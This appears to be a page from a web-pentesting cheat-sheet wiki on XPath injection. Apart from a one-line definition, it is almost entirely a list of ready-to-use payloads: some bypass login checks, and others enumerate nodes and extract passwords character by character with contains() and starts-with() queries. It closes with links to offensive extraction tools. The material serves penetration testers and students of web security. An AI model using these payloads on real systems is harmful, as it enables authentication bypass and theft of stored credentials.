XPath Injection

XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.

Login Bypass

https://book.hacktricks.xyz/pentesting-web/xpath-injection#authentication-bypass

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Exploitation

abc' or 1=1 or 'a'='b
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c

Tools

- XCat

https://github.com/orf/xcat

- xxxpwn

https://github.com/feakk/xxxpwn

- xxxpwn_smart

https://github.com/aayla-secura/xxxpwn_smart

- xpath-blind-explorer

https://github.com/micsoftvn/xpath-blind-explorer

- XMLCHOR

https://github.com/Harshal35/XMLCHOR/tree/master

PreviousLDAP InjectionNextForms, WebSockets and PostMsgs

Last updated